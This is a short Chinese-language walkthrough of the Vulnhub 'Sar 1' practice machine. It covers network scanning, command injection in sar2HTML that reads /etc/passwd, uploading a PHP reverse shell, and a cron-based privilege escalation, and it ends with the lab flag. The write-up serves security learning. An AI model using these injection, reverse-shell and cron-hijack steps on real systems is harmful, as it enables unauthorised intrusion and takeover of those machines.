Vulnhub—靶机—Sar 1
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
地址:https://www.vulnhub.com/entry/sar-1,425/
一、信息收集
【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.110.0/24
【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.110.131
【步骤三】对80端口进行目录枚举
【命令】dirb http://192.168.110.131
【步骤四】依次查看目录内容
【命令】http://192.168.110.130:8080/debug
【分析】在robots文件发现了一个东西,尝试做为目录进行访问
二、漏洞利用
【步骤五】发现这是一个web页面带有版本序列号,去查询版本是否有漏洞存在
【步骤六】发现当前版本存在远程命令执行漏洞,对漏洞进行利用
【命令】URLIP/sar2HTML/index.php?plot=;cat /etc/passwd
【步骤七】继续查看页面发现文件上传功能,尝试上传shell脚本
【命令】上传后路径:192.168.110.131/sar2HTML/sarDATA/uPLOAD/php-reverse-shell.php
【分析】kali上监听本地443端口,访问上传后的地址
【步骤八】查看计划任务
【分析】发现有一条使用sudo执行的脚本,尝试使用计划任务提权 cat /etc/crontab
【步骤九】查看执行的文件发现内部又利用bin/bash执行了目录下另一个文件
【步骤十】监听本地444端口,将phpshell的路径写入到write.sh文件,让其执行时调用执行
【命令】echo “php /var/www/html/sar2HTML/sarDATA/uPLOAD/shell.php” >> write.sh
三、Flag
【flag】66f93d6b2ca96c9ad78a8a9ba0008e99